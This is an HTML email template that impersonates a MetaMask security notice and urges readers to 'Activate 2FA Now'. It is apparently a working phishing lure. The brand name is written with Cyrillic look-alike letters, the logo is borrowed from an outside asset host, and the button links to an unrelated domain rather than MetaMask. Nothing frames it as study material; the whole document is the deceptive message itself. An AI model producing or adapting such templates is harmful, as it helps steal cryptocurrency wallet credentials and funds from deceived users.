<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Activate Two-Factor Authentication</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 20px;
            background-color: #ffffff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }

        h1 {
            color: #007BFF;
            text-align: center;
            margin-bottom: 20px;
        }

        p {
            color: #333333;
            line-height: 1.6;
            margin-bottom: 15px;
        }

        .cta-button {
            display: inline-block;
            padding: 12px 24px;
            font-size: 16px;
            font-weight: bold;
            text-align: center;
            text-decoration: none;
            background-color: #007BFF;
            color: #ffffff;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }

        .cta-button:hover {
            background-color: #0056b3;
        }

        .footer-text {
            color: #808080;
            font-size: 12px;
            text-align: center;
            margin-top: 20px;
        }

        .logo {
            display: block;
            margin: 0 auto;
            width: 300px; /* Adjust the width as needed */
            padding-top: 30px; /* Add some space between logo and content */
        }
    </style>
</head>

<body>
    <div class="container">
        <img class="logo" src="https://theme.zdassets.com/theme_assets/2313093/bad730fb4fa8145bf225c509b343cc23f951c2e9.svg" alt="МеtаМаsk Logo">
        <h1>Secure Your Funds with 2FA</h1>
        
        <p>Protect your account and secure your funds with an extra layer of security. Activate Two-Factor Authentication (2FA) today:</p>
        <a class="cta-button" href="https://dermaspa.cl/sc" target="_blank">Activate 2FA Now</a>
        <p>If you need assistance or have any questions, our support team is here to help.</p>
        <p>Thank you for safeguarding your account with us.</p>
        <p class="footer-text">© 2024 МеtаМаsk. All rights reserved. This email is for account security purposes and cannot be replied to directly.</p>
    </div>
</body>

</html>